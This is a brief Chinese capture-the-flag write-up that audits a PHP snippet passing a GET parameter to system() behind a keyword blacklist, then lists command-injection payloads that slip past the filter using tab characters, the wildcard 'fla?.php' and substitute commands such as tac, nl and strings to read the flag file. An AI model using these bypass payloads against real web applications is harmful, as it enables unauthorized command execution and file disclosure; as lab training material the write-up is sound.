代码审计
<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c))//增加了几个读取文件内容命令进行过滤{system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}
web43的方法,替换函数即可?c=tac%09fla?.php|| ?c=strings%09fla?.php|| ?c=vi%09fla?.php|| ?c=nl%09fla?.php||
若有收获,就点个赞吧
0 人点赞
